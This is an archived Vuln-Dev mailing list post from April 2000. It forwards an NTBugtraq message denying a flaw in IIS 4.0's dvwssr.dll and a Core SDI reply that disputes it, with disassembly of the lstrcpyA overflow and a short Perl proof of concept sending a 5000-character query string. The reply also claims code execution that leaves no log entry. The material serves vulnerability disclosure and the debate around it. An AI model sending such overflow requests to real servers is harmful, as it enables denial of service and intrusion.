Vulnerability Development mailing list archives
Re: Has anyone verified whether is is valid?
From: qztf7k () MYREALBOX COM (Hugo Gayosso)
Date: Fri, 14 Apr 2000 21:18:26 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 M J <lurker () ITIS COM> writes:
Friday's top stories Microsoft admits security flaw By CBS MarketWatch Last Update: 9:07 AM ET Apr 14, 2000
[...] There was a lot of mails in NTBUGTRAQ and BUGTRAQ, see if you can get to the archives, or I can forward the mails here. Basically: <from NTBUGTRAQ> From: Russ <Russ.Cooper () RC ON CA> Subject: Re: DVWSSR.dll Vulnerability in Microsoft IIS 4.0 Web Servers To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM Date: Fri, 14 Apr 2000 15:32:52 -0400 Reply-To: Russ <Russ.Cooper () RC ON CA> Ok, here's a breaking update. Latest reports say that there is NO VULNERABILITY IN DVWSSR.DLL Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ. Please accept that I have followed the story published elsewhere and tried to keep you abreast of everything I knew. Also appreciate that the amount of time given to verify and research the claims made by others has been extremely short. I've had probably 30 interviews today by orgs pressing for information on the story as the feeding frenzy occurs after the first one goes to press (WSJ in this case). . . . . </from NTBUGTRAQ> on the other hand, we have: <from BUGTRAQ> From: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM> Subject: DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web Servers To: BUGTRAQ () SECURITYFOCUS COM Date: Fri, 14 Apr 2000 20:40:48 -0300 Reply-To: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM> Organization: Core-SDI, Buenos Aires, Argentina Russ wrote (in ntbugtraq):
Ok, here's a breaking update. Latest reports say that there is NO VULNERABILITY IN DVWSSR.DLL Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ.
That is not correct. We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least. The code where the buffer overflow resides is: mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString] test eax, eax jz _text_581813FD push eax lea eax, [esp+14h+queryStringCoph] push eax call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW test eax, eax jz _text_581813FD lea eax, [esp+10h+queryStringCoph] push eax call unescape_url So, below is an example of how to exploit this vulnerability: Of course, having the source code makes it harder to find this types of bugs... #!/usr/bin/perl print "GET /_vti_bin/_vti_aut/dvwssr.dll?"; print "a" x 5000; print " HTTP/1.1\nHost: yourhost\n\n"; We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with this configuration, we have been able to make the code jump to our buffer. Under this circunstances, the actual BO allow to execute arbitrary code in the target machine. It's interesting to note that no log is generated as efect of this attack.
MS have had people working on this thing like madmen, trying to verify the claims and investigate all of the possible pieces of code that may be affected. As that research progressed, different observations were made and so the story came out in various stages (with varying levels of "correctness"). Had they been given a reasonable amount of time to respond, nobody would have been in a tizzy about anything (i.e. the press would not have cared to run this story anywhere). Decide for yourself whether we were better served by (more) immediate disclosure or not. I've stood where I stand for a reason, despite the loathing of others for my stance...
well, aparently full disclosure does serve a purpose, we only started looking at the DLL AFTER the post to ntbugtraq, if that didnt happend we wouldnt direct our attention to that particular DLL. In your own word "decide for yourself whether...." richie & beto for Core SDI - -- A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0 Investigacion y Desarrollo - CoreLabs - Core SDI http://www.core-sdi.com </from BUGTRAQ> Greetings, - -- Hugo Gayosso Support the Free Software Support the GNU Project http://www.gnu.org http://hgayosso.linuxave.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE498NiMNObVRBZveYRAtOhAJ47fmD9zxr2teSooD4b68Wsi6LRxQCfaELQ RaqVHUyIhpSP9kVZGn8whJw= =ZCvK -----END PGP SIGNATURE-----
Current thread:
- Has anyone verified whether is is valid? M J (Apr 14)
- Re: Has anyone verified whether is is valid? Joe (Apr 14)
- Re: Has anyone verified whether is is valid? Ron DuFresne (Apr 14)
- Re: Has anyone verified whether is is valid? Ryan Permeh (Apr 14)
- Re: Has anyone verified whether is is valid? Maxime Rousseau (Apr 14)
- <Possible follow-ups>
- Re: Has anyone verified whether is is valid? Hugo Gayosso (Apr 14)
- Re: Has anyone verified whether is is valid? Marc (Apr 14)
- Re: dvwssr.dll (Has anyone verified whether is is valid?) Blue Boar (Apr 14)
- Re: dvwssr.dll (Has anyone verified whether is is valid?) Marc (Apr 14)
- Re: dvwssr.dll (Has anyone verified whether is is valid?) Blue Boar (Apr 15)
- Re: dvwssr.dll (Has anyone verified whether is is valid?) Marc (Apr 15)
- Re: dvwssr.dll (Has anyone verified whether is is valid?) Blue Boar (Apr 14)
- Oulook password Hap2782 (Apr 15)
- Re: Oulook password Blue Boar (Apr 15)
- [Fwd: R: Oulook password] Blue Boar (Apr 15)